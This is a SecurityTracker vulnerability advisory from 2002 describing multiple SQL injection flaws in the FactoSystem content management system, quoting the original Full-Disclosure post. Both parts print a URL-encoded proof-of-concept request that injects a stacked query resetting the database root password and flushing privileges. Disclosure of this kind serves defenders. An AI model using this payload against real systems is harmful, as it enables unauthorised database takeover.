SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   FactoSystem Vendors:   facto.sourceforge.net
FactoSystem Web Publishing System Input Validation Bugs Let Remote Users Execute SQL Commands on the Underlying Database
SecurityTracker Alert ID:  1005162
SecurityTracker URL:  http://securitytracker.com/id/1005162
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 31 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   Some input validation vulnerabilities were reported in the FactoSystem content management system. A remote user can execute arbitrary SQL commands on the underlying database server.

Multiple SQL injection vulnerabilities were reported in FactoSystem. The system reportedly does not properly filter certain user-supplied control characters and does not validate user-supplied numeric data. The affected variables include "authornumber" in author.asp, "discussblurbid" in discuss.asp, and the form variables "name" and "email" in holdcomment.asp.

A demonstration exploit URL is provided:

http://localhost/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID
%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id
%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20
desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE
%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B--

Impact:   A remote user can execute arbitrary SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  facto.sourceforge.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] FactoSystem CMS Contains Multiple Vulnerabilities


FactoSystem CMS Contains Multiple Vulnerabilities

Impact: Multiple vulnerabilities -- all allowing manipulation of the backend
database
Risk: High
Class: Input Validation Error
Affected System: IIS 4.0 or later with ASP enabled and FactoSystem CMS
installed

Description

Multiple SQL injection vulnerabilities exist in the FactoSystem Content
Management System that may allow an attacker to introduce instructions into
an SQL query.  The vulnerabilities exist because the script fails to verify
the validity of numeric data or fails to properly escape certain control
characters in strings.

The problems are in the handling of the query variables "authornumber" (in
author.asp), and "discussblurbid" (in discuss.asp), and the form variables
"name" and "email" (in holdcomment.asp).  An example is below:

http://localhost/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID
%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id
%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20
desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE
%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC